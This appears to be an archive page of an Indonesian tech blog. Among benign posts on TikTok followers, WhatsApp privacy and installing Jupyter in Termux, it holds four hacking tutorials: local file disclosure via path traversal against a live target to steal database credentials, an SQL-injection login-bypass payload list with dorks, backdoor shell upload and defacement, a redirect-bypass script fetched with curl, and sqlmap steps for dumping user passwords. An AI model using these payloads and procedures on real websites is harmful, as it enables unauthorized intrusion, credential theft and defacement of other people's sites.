HEADLINE NEWS

6 Tips Jitu Cara Menambah Follower Di Tiktok Tanpa Harus Bayar

By On 6:53:00 AM

   Bagi para pengguna media sosial, jumlah follower menjadi hal yang sangat penting. Banyaknya follower tersebut menandakan bahwa konten-konten yang diunggah menarik. Selain itu, follower juga memegang peranan penting agar Anda dapat menghasil uang dari media sosial. Para pemilik brand-brand tertentu akan melirik Anda dan menawarkan endorsement. Bahkan, Anda juga akan lebih mudah untuk masuk FYP jika para follower tersebut melihat serta memberikan like pada setiap unggahan Anda. Agar follower terus naik maka ada baiknya Anda mengetahui cara menambah follower di TikTok tanpa harus mengeluarkan uang.

Tips Jitu Cara Menambah Follower Tiktok Gratis Tanpa Aplikasi

Jika Anda tertarik untuk menghasilkan uang dari aplikasi TikTok maka tingkatkan terus follower Anda. Di bawah ini adalah beberapa cara menambah follower TikTok yang bisa Anda lakukan secara gratis.

Follow Akun Lain

Cara pertama untuk menambah follower yaitu Anda juga harus aktif follow akun pengguna TikTok lainnya. Jika orang tersebut tidak melakukan follow back maka Anda dapat unfollow. Hal yang demikian bisa dikarenakan orang tersebut kurang begitu tertarik dengan konten yang Anda buat.

Buat Konten Viral

Hal menarik dari aplikasi TikTok adalah adanya tantang untuk para penggunanya. Anda dapat membuat video tantangan ini atau membuat video yang sedang viral. Agar Anda pun juga dapat viral maka buatlah video yang lebih unik dan kreatif. Keunikan tersebut akan membuat video Anda lebih menarik dan berbeda dari yang lainnya. Hal ini menjadi salah satu cara ampuh untuk menarik hati para follower.

Kolaborasi

Kolaborasi merupakan hal yang umum dilakukan oleh para pengguna media sosial. Hal ini akan menguntungkan kedua belah pihak karena akan sama-sama mendapatkan konten dan follower masing-masing akan saling follow.

Buatlah konten kolaborasi dengan pengguna TikTok lainnya. Bahkan, Anda bisa mengajak kenalan Anda yang memiliki follower cukup banyak. Dari konten tersebut nantinya akan mendapatkan penggemar baru dan akan mengikuti akun Anda.

Kreatif Dan Unik

Konten video TikTok tidak melulu berisi video joget-joget. Anda dapat membuat konten yang masih jarang dibuat oleh orang lain. Dengan demikian, para pengguna TikTok akan mendapatkan hiburan baru sehingga akan membuat mereka lebih tertarik dengan konten Anda. Selain itu, buatlah konten yang otentik dari hasil kreatifitas Anda sendiri. Anda juga dapat memaksimalkan kreativitas yang Anda miliki dengan menggunakan berbagai macam fitur dan efek yang disediakan oleh TikTok. Jika Anda mengeksplornya dengan baik maka Anda dapat membuat konten dengan efek yang keren.

Interaktif Dengan Follower

Umumnya, follower adalah orang-orang yang mengagumi Anda secara pribadi atau juga mengagumi konten-konten yang Anda buat. Agar follower merasa senang dan diperhatikan maka Anda juga harus menyempatkan waktu untuk berinteraksi dengan mereka. Sesekali balas komentar mereka atau juga dengan memberikan like. Hal ini akan membuat pengguna TikTok lainnya akan tertarik mengikuti Anda.

Memaksimalkan Profil

Agar orang-orang tertarik untuk mengunjungi profil Anda dan mulai follow akun Anda maka gunakan foto yang menarik. Selain itu, tuliskan sedikit informasi tentang Anda atau tautkan prestasi yang pernah Anda raih. Hal ini bertujuan agar orang-orang yang baru melihat profil Anda tahu bahwa Anda adalah orang yang berpengaruh.

Demikianlah cara menambah follower TikTok tanpa menggunakan aplikasi atau modal. Semoga cara-cara di atas dapat membantu Anda lebih cepat dapat mendapatkan follower. Selamat mencoba dan semoga sukses.

https://www.iteachandroid.com/cara-dapat-followers-tiktok/

Cara Agar Terlihat Offline di Whatsapp

By On 7:56:00 AM

 Kali ini kita akan membahas tentang cara agar terlihat offline di Whatsapp. Whatsapp akan selalu menampilkan keterangan online saat kita membuka Whatsapp. Beberapa orang terkadang merasa terganggu dengan hal ini. Terlebih saat kamu sedang ingin berlama-lama chat dengan orang lain.

Karena terkadang kamu butuh privasi dan tidak ingin diketahui saat sedang online. Ada beberapa alasan orang ingin terlihat offline di aplikasi Whatsapp. Mungkin kamu juga termasuk salah satu orang yang ingin terlihat offline di Whatsapp. 


Salah satu alasan kamu ingin terlihat offline mungkin karena kamu tidak ingin diganggu. Saat kamu sedang sibuk atau sedang mengerjakan sesuatu yang penting, pastinya kamu tidak ingin buang waktu dengan membaca chat, kan?

Bisa juga pada saat tertentu kamu butuh waktu untuk sendiri, jadi kamu malas membaca chat yang masuk di Whatsapp kamu. Terlebih jika itu adalah chat yang menurut kamu tidak penting, atau malah chat yang mengganggu. Seringkali juga chat dari grup bisa sangat mengganggu karena obrolan yang ada tidak bermanfaat. Karena itu, kamu mungkin mencari cara Agar Terlihat Offline di Whatsapp,
Untuk mengatasi semua masalah tersebut, kamu bisa menerapkan cara agar terlihat offline di Whatsapp yang satu ini. Meski hampir semua pengguna smartphone menggunakan Whatsapp, tapi masih ada beberapa orang yang belum mengetahuinya. Kalau kamu sudah membaca artikel ini, beritahukan pada semua orang yang belum mengetahuinya. Berikut ini cara agar terlihat offline di Whatsapp.
  1. Bukalah menu Settings di Whatsapp dengan memilih ikon tiga titik di pojok kanan layar smartphone kamu.
  2. Setelah kamu memilih menu Settings, pilihlah opsi Account yang muncul.
  3. Selanjutnya pilih opsi Privacy
  4. Akan muncul beberapa pilihan di opsi tersebut, Last seen, Profile Photo, About, Status, dan Live location.
  5. Pilih opsi Last seen dan akan muncul 3 pilihan lagi:
    • Everyone
Jika kamu memilih opsi ini, semua orang yang menyimpan kontak kamu akan dapat melihat kapan terakhir kali kamu offline atau Last seen kamu. Dengan memilih ini, berarti semua orang dapat meilhat kapan terakhir kamu offline. Sama saja kamu memberitahu kapan saja kamu online kepada semua orang yang menyimpan kontak kamu.
    • My contacts
Dengan memilih opsi My contacts ini, semua kontak yang sudah kamu simpan di smartphone kamu akan bisa melihat kapan terakhir kali kamu online di aplikasi Whatsapp. Bedanya, orang lain yang menyimpan kontak kamu tapi kamu tidak menyimpan kontaknya tidak akan bisa melihat kapan terakhir kali kamu offline. Ini berarti kontak yang sudah kamu simpan bisa melihat Last seen kamu, tetap kurang efektif.
    • Nobody
Nah, ini dia pilihan yang paling tepat kalau kamu tidak ingin siapapun melihat kapan terakhir kali kamu offline. Baik itu semua orang yang menyimpan kontak Whatsapp kamu atau semua kontak yang sudah kamu simpan di smartphone kamu. 

Cobalah cara agar terlihat offline di Whatsapp ini supaya kamu merasa punya privasi lebih saat menggunakan Whatsapp. Kamu tidak perlu khawatir untuk tidak segera membaca ataupun membalas chat yang masuk. Misalkan kamu sedang tidak ingin diganggu atau ingin fokus ke kesibukan kamu, cara agar terlihat offline di Whatsapp ini bisa memberikan kamu waktu untuk melakukan aktifitas tersebut.

Namun sayang sekali, cara ini masih memiliki kelemahan. Kelemahannya adalah saat kamu sedang online dan ada seseorang yang membuka jendela chat dengan kamu, kamu akan tetap terlihat online. Jadi, kami sarankan untuk tidak online terlalu lama supaya cara agar terlihat offline di Whatsapp ini bisa lebih efektif. Bukalah Whatsapp kamu hanya saat ada chat penting yang masuk. Hapuslah notifikasi Whatsapp yang mengganggu, kamu pasti bisa fokus dengan kesibukan kamu.
Nah, itulah cara agar terlihat offline di Whatsapp yang sudah rangkum dan pastinya bisa kamu lakukan di aplikasi Whatsapp kamu. Jangan lupa isi kolom komentar di bawah ini kalau kamu punya kritik dan saran.

Tutorial Local File Disclosure - LFD

By On 2:59:00 AM


Hallo, Apa kabar?

Dari tulisan saya kali ini, saya ingin sharing tentang bagaimana cara exploitasi celah keamanan Local File Disclosure pada suatu website.

Tutorial Local File Disclosure
Tutorial Local File Disclosure


Apa itu Local File Disclosure?

Vulnerability Local File Disclosure (LFD) ini sebenarnya konsepnya hampir mirip dengan LFI/RFI, akan tetapi yang membedakannya disini adalah kalau celah LFD ini file tidak dapat ditampilkan pada browser melainkan file hanya bisa kita download lalu baru kita bisa membaca.

Tapi ya intinya, setiap vulnerability tersebut memiliki perbedaan masing-masing.

Bagaimana bisa, Celah ini terjadi?

Biasanya fungsi yang memiliki resiko vulnerability LFD adalah semua fungsi yang dapat membaca suatu file. Kalau dalam bahasa pemrograman PHP itu sendiri diantaranya adalah seperti fungsi readfile(), File(), Fgets(), dan lain sebagainya.

Bahaya dari adanya LFD?

LFD ini termasuk celah yang memiliki severity high-critical, jadi bahayanya? Attacker dapat melihat source code dari website tersebut, sehingga dapat melihat file atau data sensitif.

Oke sekarang lanjut, time for pratice.

Cara Eksploitasi Local File Disclosure

Target: aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3lBMzBWZTJh==

DISCLAIMER: Mohon live target yang saya berikan untuk jadikan bahan belajar bersama jangan sampai dirusak ya boss, kalau ada apa-apa diluar itu semua bukan tanggung jawab saya.

Hal pertama yang saya lakukan adalah mencari endpoint celah tersebut. Setelah mencari dan akhirnya ketemu bug tersebut, kira-kira seperti ini.

URL/download.php?filename=christ-market.pdf

Pikir saya, Apakah web tersebut vuln lfd? Kita coba saja.

Gimana kalau kita sekarang coba untuk menginput file index.php lewat parameter yang tertera di url tersebut apakah file tersebut akan ke download atau tidak, jadi caranya seperti ini.

URL/download.php?filename=index.php

Kemudian jalankan, dan hasil output yang saya dapatkan tersebut seperti pada gambar bawah ini,

Tutorial Local File Disclosure

Why? Dari pesan tersebut menyatakan file tidak ditemukan atau tidak bisa diakses hahahahaha.

Not problem.

Untuk mengatasi masalah tersebut, kita juga bisa mengkombinasikan celah lfd ini dengan directory traversal atau bisa disebut dengan dot dot slash ../. Maksud Directory Traversal ini digunakan untuk melihat isi suatu file pada parent directory dimana kita sekarang atau singkatnya gini buat naik directory ke lebih atas.

Sudah paham?

Sekarang mari kita coba dengan naikan directory tersebut dengan menambahkan dot dot slash ../

URL/download.php?filename=../index.php

Setelah saya jalankan hasilnya sama saja file index.php belum ke download, sekarang coba naikan lagi dari semula ../index.php menjadi naik ke ../../index.php

URL/download.php?filename=../../index.php

Setelah itu jalankan dan boom saya berhasil, file tersebut ke download.

Tutorial Local File Disclosure

Sekarang buka file index.php tersebut menggunakan aplikasi editor, dari isi source code tersebut seperti ini.

Tutorial Local File Disclosure

Nah langkah selanjutnya tinggal mencari directory dimana kira-kira file database tersebut, singkat cerita disini saya berhasil mendownload file config dari website tersebut.

Tutorial Local File Disclosure

Dan disini saya dapat membaca isi file config yang berisi data sensitif seperti username, password dari database website tersebut.

Tutorial Local File Disclosure

Kalau sudah begini ya kita tinggal login pada database website tersebut wkwkwk.

Gimana menurutmu? Mudah kan.
Kalau celah ini sebenarnya gampang kita eksploitasi terlebih jika tidak ada web application firewall yang digunakan pada server tersebut.

Tapi sekarang jarang sekali menemukan bug yang seperti ini, coba deh kamu main ke exploit-db dll barang kali disitu ada.

Patch
Lakukan filter input, sehingga input yang dimasukan hanya dapat mengakses direktori yang telah kita tentukan saja.

Kode patch:
https://pastebin.com/raw/4eTeS20S

Sekian dari saya, semoga artikel pada kali mengenai Local File Disclosure sangat bermanfaat buat kalian semua. Maaf kalau ada penjelasan atau tulisan yang dapat kurang dimengerti.

Terimakasih, Matursuwun. Have Fun!

Tutorial Deface Bypass Admin Login dan Cara Patch Bug Bypass Admin

By On 5:57:00 AM


Hallo, Apa kabar?

Bypass Admin Login~ Sebenarnya ini tidak jauh berbeda dan masih berhubungan dengan SQL Injection. Jika kita ketahui, bug ini memungkinkan seorang attacker untuk masuk sebagai admin hanya dengan memasukan username dan password contoh seperti or 1=1 tanpa harus repot-repot seperti halnya melakukan ekploitasi website.

Tutorial Deface Bypass Admin Login

Pengertianya cukup itu saja. Oiya buat yang masih belum mengerti atau pengen tahu yang lebih jelas, kenapa ini bisa terjadi? Lalu dimana letak kesalahan tersebut? Oke, saya sudah menyiapkan artikel sebagai referensi untuk bisa kamu baca mengenai hal ini, berikut linknya:

Payload Bypass Admin

Dari sekian banyak query yang bertebaran di internet, disini saya akan membagikan beberapa query yang sering saya gunakan untuk bypass admin login website, diantaranya sebagai berikut:

admin' #
admin' or '1'='1
admin' or '1'='1'#
admin' or 1=1 or ''='
'or 1=1 limit 1 -- -+
' or '1'='1
' or 'x'='x
' or 0=0 --
' or 0=0 #
' or 1=1--
' or 'one'='one
'or 1=1-- -
'or''='

Hanya segitu? Iya cuma itu saja, payload bypass admin login tersebut saya gunakan dari awal saya mengenal/melakukan deface (2015) sampai sekarang (tapi sudah jarang sekali). Nah, jika kamu punya payload yang lain mungkin bisa di share pada kolom komentar biar teman-teman yang lain juga pada tahu.

Baiklah tanpa berlama-lama, sekarang mari kita ke inti pokok pembahasan selanjutnya, lestgooo.

Tutorial Bypass Admin Login Website

Nah, apa saja yang diperlukan? Berikut diantaranya:

1. Dork
2. Shell Backdoor
3. Script Deface

Penjelasan:
Dork~ Jika tidak punya target kamu bisa mencari website yang terkait vulnerability bypass admin login dengan dork, contoh dork misalnya.

"inurl:/admin/login.php"
"inurl:/admin/login.php" site:.id

Selebihnya kamu kembangkan lagi ya biar bisa dapat yang fresh.

Shell Backdoor~ File backdoor ini berguna untuk edit, upload dan lain sebagainya.

Script Deface~ Jika belum punya kamu bisa download script deface lewat pencarian Google atau kalo bisa ya lebih baik bikin sendiri saja.

Baiklah dari apa yang sudah saya sebutkan (3 bahan) tadi, jika kamu sudah punya. Sekarang mari kita simak beberapa tutorial dibawah ini.

POC (Prof End Concept) Bypass Admin Login

Step 1: Eksekusi Target

Hasil dari mencari target dengan dork, kurang lebih seperti ini target yang saya dapatkan.

http://target.com/admin/index.php

Nah sekarang, tinggal mengeksekusi website tersebut bisa atau tidaknya saya dapat masuk ke dashboard panel admin dengan menggunakan payload yang tadi saya sebutkan diatas dan saya mencoba menggunakan payload yang admin' or 1=1 or ''='

Disaat berada di dashboard panel admin login, kamu isikan username: admin' or 1=1 or ''=' password: admin' or 1=1 or ''='

Halaman Login Admin

Kemudian tinggal klik pada tombol Login website tersebut. Apabila berhasil kamu akan diarahkan menuju ke menu dashboard panel admin website tersebut, dan itu artinya kamu sudah bisa mengakses seluruh isi website.

Dashboard Panel Admin Website

Catatan: Perlu di ingat, tidak semua form login admin website bisa di injeksi dengan cara seperti ini, jika gagal kemungkinan sudah di patch bugnya, kamu bisa coba payload yang lain atau cari target yang lainya saja.

Step 2: Upload Shell

Jika kamu sudah berhasil masuk ke dashboard panel admin website target kamu itu artinya sekarang kamu sudah bisa upload shell, edit artikel dan lain sebagainya.

Lalu bagaimana caranya upload shell backdoor?

Tips: Jika kita tidak bisa upload shell backdoor dikarenakan form upload tersebut hanya memperbolehkan upload file berformat ".jpg, .gif, .jpeg" kita bisa mengakalinya dengan bypass extensi shell tersebut. Contoh misalnya seperti ini "shell.php.jpg, shell.jpg.php, shell.jpg.PhP" dan lain sebagainya.

Dan untungnya pada target saya tidak terlalu ribet harus ini itu untuk upload shell backdoornya alias tidak ada masalah sama sekali, kira-kira kalau saya jelaskan proses atau alur upload shellnya begini.

Cari tempat upload > tempat upload ketemu di bagian menu partners > kemudian tinggal upload shell backdoor extensi .php > Done tanpa harus bypass shell.

Tampilan Shell Backdoor - Upload Sukses

Info: Jika belum punya shell backdoor bisa download dari link berikut ini > Download Shell Backdoor

Step 3: Deface

Oke, setelah berhasil menanam shell backdoor pada website target. Langkah selanjutnya kita tinggal upload file script deface, jika ingin menebas index.php tinggal cari aja di bagian directory home page website tersebut. Tapi disini saya hanya menitipkan file saja tidak mengganti file index.php sama sekalipun.

Tampilan Script Deface

Gimana menurut kamu mudah bukan? Jangan lupa untuk mencobanya sendiri ya tapi tidak boleh berlebihan, dikarenakan berbahaya.

Lanjut aja yukk.

Ada baiknya kalau kita setelah melakukan deface website tersebut, kita juga bisa membantu mereka dengan menutup atau patch bug bypass admin login tanpa harus melaporkan terlebih dahulu, cukup lakukan secara diam-diam dan anggap saja ini sebagai bonus dari kamu gitu deh, heker baik hati wkwkk.

Untuk caranya simak penjelasan singkat berikut ini.

Cara Patch Bug Bypass Admin Login


Sebenarnya untuk cara melakukan patch bug bypass admin pada website itu sangat mudah, kamu hanya cukup dengan menambahkan perintah mysqli_escape_string.

Berikut ini contoh source kode yang memiliki vulnerability bypass admin login, saya akan ambil bagian tertentu saja ya.




<?php
$message = "";
if(isset($_POST['submit'])) {
$username = ($_POST['username']);
$password = ($_POST['password']);
kode bla bla bla
kode bla bla bla
kode bla bla bla
} else {
$message = "Username and Password is not matched";
}
}
?>

Jika kita pahami pada source kode diatas, berikut ini adalah kode dimana yang menjadi masalah yaitu bisa di bypass admin login.

$username = ($_POST['username']);
$password = ($_POST['password']);

Penjelasan begini, kita tahu bahwa kode tersebut tidak ada filterisasi karakter yang mengakibatkan adanya bug dimana seorang attacker bisa dapat memasukan query injeksi dan dapat masuk ke dashboard panel admin suatu website.

Nah, maka dari itu kita tambahkan saja kode atau fungsi mysqli_escape_string di bagian kode yang dapat menyebabkan bug tadi, jika digabungkan caranya seperti ini kodenya.

$username = mysqli_escape_string($con, $_POST['username']);
$password = mysqli_escape_string($con, $_POST['password']);

Sudah paham kan caranya? Jika sudah, Bagus deh!

Jadi setelah menambahkan filter pada bagian kode $username dan $password dengan fungsi mysqli_escape_string tersebut, seorang attacker tidak akan bisa menginjeksi admin login, mantap haha.

Selamat mencoba, enjoy...

Penutup:

Demikian artikel sederhana yang saya tulis ini, tentang Tutorial Deface Bypass Admin Login dan Cara Patch Bug Bypass Admin berdasarkan pengalaman yang sudah saya pelajari, semoga dapat berguna dan bermanfaat buat semua orang.

Dari saya maaf jika ada kesalahan atau kurang jelas dalam penulisan, mohon untuk diluruskan/maklumi karena saya juga pemula pake banget. Buat kamu ada yang mau dipertanyakan soal ini silahkan tuliskan dikolom komentar dibawah, sebisa mungkin saya akan bantu jawab.

Matursuwun, Bye~

Tutorial Cara Bypass Admin Login Page Dengan No Redirect - Android

By On 4:07:00 AM


Bypass Admin Login Page No Redirect~
Hallo, Apa kabar?
Melalui artikel ini, saya ingin sedikit sharing tentang bagaimana cara mengekploitasi celah atau vulnerability No Redirect di suatu website.

Biasanya celah ini ditemukan pada suatu halaman login page, dengan adanya celah no redirect ini kamu bisa menjadi admin website tanpa harus terlebih dahulu mengetahui nama seperti username, password dari website tersebut.

Bypass Admin Login Page with No Redirect

Sebagai contoh pada suatu kasus, untuk bisa masuk ke halaman Dashboard Admin yang biasanya terdapat pada file /admin/dashboard.php kita diharuskan untuk login terlebih dahulu. Nah, maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login terlebih dahulu, misalnya di file /admin/login.php

Jadi, sudah paham kan maksudnya? Oke sipp.

Sekarang, tanpa berlama-lama mari kita lanjut ke tutorial selanjutnya.

Bahan-bahan:
Di tutorial ini saya memakai Hp Android, jadi apa saja yang harus dipersiapkan adalah sebagai berikut ini,

1. Termux
2. Browser Chrome
3. Script PHP (NO REDIRECT) Web Bassed

Cuma 3 itu saja yang harus dipersiapkan untuk melakukan cara ini, simpel kan? Sebenarnya caranya mudah kok tidak terlalu ribet. Baiklah setelah kamu mempersiapkan sesuai apa yang sudah saya sebutkan, sekarang ayo mari kita mulai step by step berikut ini.

Cara Bypass Admin Login Page Dengan No Redirect

Langkah 1: Termux

Buka aplikasi terminal Termux kamu, kemudian kalian ketikan perintah seperti berikut ini,

$ pkg install php

Jika sudah selesai install package PHP, langkah selanjutnya kita download terlebih dahulu script php no redirect web bassed tersebut, yang mana script ini nantinya bisa kita gunakan untuk bypass halaman admin login website.

Link download > Script PHP (No Redirect)
Atau kalau yang mau simpel cara download script tersebut, bisa kalian ketikan perintah berikut ini,

$ curl https://pastebin.com/raw/L60bXtWD>no-redirect.php

Sudah bisa downloadnya?
Oke, langkah selanjutnya adalah menjalankan localhost di termux dengan PHP yang mana ini nantinya bisa kita gunakan sebagai web server untuk menjalankan script no-redirect.php tersebut.

Ketikan perintah berikut ini pada terminal Termux kamu,

$ php -S localhost:8080

Kemudian tekan enter ya, langkah selanjutnya simak penjelasan berikut ini.

Langkah 2: Jalankan Script No Redirect di Browser Chrome

Jika kamu sudah mengikuti step by step seperti apa yang sudah saya jelaskan diatas, sekarang mari kita ke langkah untuk eksekusi target.

Hal pertama, buka aplikasi Browser Chrome kamu kemudian ketikan perintah berikut ini pada kolom address bar chrome kamu,

http://localhost:8080/no-redirect.php

Jika sudah kamu jalankan, kira-kira tampilan dari script no-redirect.php tersebut seperti ini,

No Redirect Script PHP Web Bassed Tools

Lalu gimana lagi?
Disini saya asumsikan kamu sudah punya target yang mau dibypass. Nah oke, sekarang langkah selanjutnya adalah memasukan URL target yang mau di bypass pada kolom input.

CATATAN: Sebelum kamu klik tombol GO ada baiknya kamu off kan terlebih dahulu JavaScript di browser chrome tersebut biar tidak ada kendala saat dalam proses eksekusi target.

Jika belum tahu caranya menonaktifkan JavaScript di Chrome, pergi ke Setelan > Setelan situs > Klik JavaScript > Terus off/blokir.

Contoh target saya, anggap saja seperti ini,

http://target.com/admin/dashboard.php

Isi target url pada kolom input - script no-redirect.php
Kalau sudah kamu ketikan URL di kolom input, kemudian langsung saja klik tombol GO pada script tersebut, dan lihat apa yang terjadi?

Sukses Berhasil Bypass Admin Login Dengan No Redirect

Yuhuu mantap sekali, saya berhasil bypass halaman dashboard website tersebut tanpa harus login menggunakan user/pass terlebih dahulu alias bypass no redirect berhasil wkwkk.

TIPS: Bagaimana bisa saya menemukan file directory "/admin/dashboard.php", nah untuk hal ini kamu bisa menebak secara manual sesuai imajinasi kamu, atau kalau tidak bisa kamu bisa menggunakan tools seperti Dirsearch, Admin Finder, dan lain sebagainya untuk mencari directory file halaman admin login tersebut.

Setelah itu, jika sudah sukses bypass no redirect kamu mau apakan website tersebut? Itu terserah kamu aja deh ya.

Selesai deh...

Perlu diketahui juga, terkadang dengan mengaplikasikan teknik bypass halaman admin login page dengan no redirect seperti ini, tidak semuanya berjalan sesuai apa yang dipikirkan, kadang bisa di bypass kadang tidak bisa di bypass. Bisa jadi ketika tidak bisa di bypass kemungkinan website target tersebut sudah di patch atau malah ada waf (saya kurang tahu), tidak apa-apa jangan ambil pusing mungkin bisa cari target yang lain.

Oke kurang lebih seperti itu, demikian artikel sederhana yang saya tulis ini, semoga apa yang saya bagikan ini dapat bermanfaat buat teman-teman semua. Jika ada kesalahan entah itu dalam penjelasan/penulisan mohon untuk diluruskan ya. Ingat, artikel ini saya tulis hanya bertujuan untuk edukasi.

Sekian dari saya, Terimakasih!

Belajar Cara Mendapatkan Username Dan Password Website Menggunakan Tools SQLMAP di Termux

By On 12:37:00 AM


Heyo, apakabar?

Hingga sampai saat ini, SQL Injection masih menjadi salah satu serangan yang banyak dilakukan oleh Hacker. Jenis serangan ini dapat menimbulkan banyak kerugian karena disebabkan rusaknya database dari sebuah situs atau website tersebut.

Biasanya Hacker menggunakan teknik SQL Injection ini untuk mencuri informasi yang sangat penting misal seperti data username, password, dsb bahkan bisa memasukan script yang berbahaya, parah bukan?

Tutorial Cara Menggunakan SQLMAP di Termux

Nah oke, melalui artikel ini, saya ingin sharing sedikit tentang bagaimana sih cara mencari username dan password website dengan menggunakan SQLMAP ditermux android. Tujuan dari ini semua adalah sebagai media belajar SQL Injection maupun sebagai referensi buat kamu yang tentunya ingin belajar, bukan maksud yang lain hehe.

Oiyaa, apa itu SQLMAP?


Jadi penjelasan singkatnya gini, SQLMAP adalah sebuah script eksploitasi yang ditulis dengan bahasa pemrograman Python, dimana cara kerja tools slqmap ini yakni dapat melakukan eksploitasi terhadap situs website yang memiliki bug atau celah terhadap serangan SQL Injection.

Kira-kira kurang lebih seperti itu penjelasanya, sekarang mari kita simak Cara Install Sqlmap di Termux terlebih dahulu untuk sebelum lanjut ketutorial selanjutnya.

STEP 1: Install SQLMAP di Termux


Bagi yang belum install Termux, saya sarankan install dulu aja download lewat Playstore, karena termux ini nanti sebagai terminal buat menjalankan tools sqlmap.

Maaf ya sebelumnya, untuk cara install sqlmap termux kamu bisa baca pada artikel yang sebelumnya sudah saya publikasikan diblog ini, berikut ini artikelnya buat kamu Cara Install SQLMAP di Termux makasih.

STEP 2: Mencari Website Target


Dalam hal ini sangatlah mudah untuk mencari target yang vulnerability terhadap serangan SQL Injection, kamu bisa menggunakan dengan Dork.

Contoh dork sqli: intext:"produk" inurl:".php?ID=" site:id

Bisa kamu kembangkan lebih dalam lagi sesuai imajinasimu, supaya mendapatkan hasil yang bisa dibilang fresh dan maksimal. Untuk hal ini kamu juga harus paham dasar-dasar dork biar tidak binggung.

Biasanya sih, kalau ngedorknya lewat Search Engine Google kadang dikit-dikit terkena Captcha, saran saya mending ngedorknya melalui mesin pencarian Bing aja.

Target Saya:
http://url/pagina.php?id=10

STEP 3: Mulai Menggunakan SQLMAP


Jika semuanya sudah siap termasuk proses install tools sqlmap selesai dsb, mari kita mulai dengan cara menggunakan sqlmap.

Hal pertama ketikan perintah help berikut ini pada terminal termux kamu, guna untuk mengetahui perintah atau pentujuk apa saja yang ada di tools sqlmap, biar paham.

$ python sqlmap.py -h

Jika kita kamu jalankan perintah tersebut, kurang lebih tampilanya akan seperti pada gambar berikut ini.

Sqlimap Perintah help -h --hh
Kalau sudah dipahami dalam penggunaanya, selanjutnya mari kita ketahap ekseskusi target.



STEP 4: Eksekusi Target


Setelah sudah ada target yang mau diinjeksi, pertama kamu cek terlebih dahulu apakah website target kamu rentan terhadap sql injection atau tidak, dengan perintah seperti berikut ini.

$ python sqlmap.py -u http://url/pagina.php?id=10

Cek vuln sqli pada sqlmap termux

Nah, jika kamu sudah mengetahui website yang kamu masukan tadi rentan terhadap sql injection dan bisa dikatakan dapat dieksploitasi, langkah selanjutnya yakni mencari tahu nama database apa saja yang ada diwebsite tersebut.



1. Mencari Database

Ketikan perintah berikut ini pada terminal termux kamu guna untuk mencari database.

$ python sqlmap.py -u http://url/pagina.php?id=10 --threads 10 --dbs

Sqlmap dump database di termux

Jika kita ketahui, dari output tampilan sqlmap tersebut mendapatkan jumlah 3 database, selanjutnya kamu dapat melakukan perintah untuk mengetahui tables apa saja yang ada diwebsite tersebut.

2. Mendapatkan Informasi Tables



Disini untuk mendapatkan informasi tables, saya memilih database "czga1" lalu ketikan seperti berikut ini.

$ python sqlmap.py -u http://url/pagina.php?id=10 --threads 10 --tables -D czga1

Sqlmap dump database tables di termux

Dari hasil setelah menjalankan perintah tersebut, disini saya mendaptkan jumlah 6 tables pada database czga1. Langkah selanjutnya apa? Simak berikut ini.



3. Mendapatkan Username dan Password

Dalam hal ini untuk mencari username dan password, kira-kira biasanya ada ditables seperti User, Admin, Login dsb yang sekiranya masih berhubungan.
Disini saya akan mencoba columns pada table user, caranya seperti ini.

$ python sqlmap.py -u http://url/pagina.php?id=10 --threads 10 -D czga1 -T user --columns

Sqlmap dump database columns di termux

Oke, dari tables user jumlahnya ada 3 columns yaitu ada id, nume, parola. Nah, ini semua adalah bisa dikatakan untuk informasi login diwebsite tersebut.

Sekarang selanjutnya adalah dump database dari columns user tersebut, caranya ketikan perintah seperti berikut ini.

$ python sqlmap.py -u http://url/pagina.php?id=10 --threads 10 -D czga1 -T user --dump

Dump database username dan password dengan sqlmap termux

Booomm, berhasilkan?
Sip oke, dari sini saya berhasil mendapatkan informasi login username dan password yang ada diwebsite tersebut.
Tapi disitu password yang saya dapatkan masih berbentuk atau jenis MD5, buat kamu kalau menemukan password yang sudah di terenkripsi kamu harus crack password tersebut untuk melihat password yang asli.

Setahu saya, kalau ditools sqlmap itu sebenarnya sudah menyediakan proses untuk crack password tersebut, Nah akan tetapi menurut saya rasanya kurang begitu memuaskan dalam hasilnya. Untuk hal itu saya merekomendasikan website tempat crack password online, yaitu kamu bisa baca pada artikel yang sebelumnya sudah saya bahas, kamu bisa baca Kumpulan Website Hash Password Online



Baiklah, sudah selesai, mudahkan?
Jika kamu ingin bertanya silahkan tinggalkan pesan pada kolom komentar yang sudah disediakan dibawah, dengan senang hati nanti saya bantu jawab sebisa mungkin.

Sekian artikel kali ini tentang Belajar Cara Mendapatkan Username Dan Password Web Menggunakan Tools SQLMAP di Termux semoga apa yang saya tulis ini dapat membantu dan bermanfaat ya.



Dari saya, mohon maaf bila ada kesalahan entah itu penulisan atau penjelasan mohon untuk dimaklumi, makasih.

Yasudah, happy hacking and enjoy, thanks!

Cara Install Jupyter Notebook: Python IDE di Android | Termux

By On 9:25:00 AM

Halo, Apa kabar?

Melalui artikel ini, saya ingin berbagi cara untuk install Jupyter Notebook khususnya di hp android, jika kamu sudah tahu tentang Python pastinya sudah tidak asing dengan Jupyter Notebook ini, yakan?

Apa itu Jupyter Notebook?

Berdasarkan informasi yang saya kutip dari jupyter.org, Jupyter Notebook adalah sebuah code editor berbasis web based dan juga berbasis interactive python. Program dijalankan per-blok dan memudahkan untuk melakukan pengujian program maupun visualisasi karena tidak perlu menjalankan seluruh program setelah mengedit sedikit program.

Image: Jupyter Notebook

Prasyarat:
Dalam tutorial ini, untuk mendukung proses installasi jupyter notebook, saya membutuhkan beberapa aplikasi seperti berikut ini:

1. Termux
2. Web Browser (saya merekomendasikan Chrome yang lain juga boleh)

Nah, jika di hp android kamu belum ada 2 aplikasi yang sudah saya sebutkan tersebut, silahkan download terlebih dahulu ya.

Langkah selanjutnya adalah bagian proses menginstal, yuk mari kita simak.

Langkah 1 - Proses Install


Buka aplikasi termux, jika kamu baru pertama kali install aplikasi termux biasanya memerlukan beberapa detik/menit untuk menginstalnya, tunggu aja.

Update dan Upgrade:
Jadi biar tidak ketinggalan kalau ada update/upgrade terbaru, ketikan perintah berikut ini.

$ pkg upgrade

Perintah tersebut untuk mengupdate dan upgrade package yang sudah terinstall di termux kamu.

Install Python:
Oke selanjuntnya kita perlu menginstall Python, ketikan perintah berikut ini.

$ pkg install python

Setelah tekan enter, nanti pada termux kamu otamatis sudah terinstall paket Python 3, kenapa tidak Python 2.7 ? Nah jika kamu belum tahu, kabarnya Core Team Python telah menggumumkan bahwa mereka akan menghentikan dukungan bagi Python 2.7 di tahun 2020 dan mereka telah menyarankan untuk mulai migrasi ke Python 3.

Upgrade Pip:
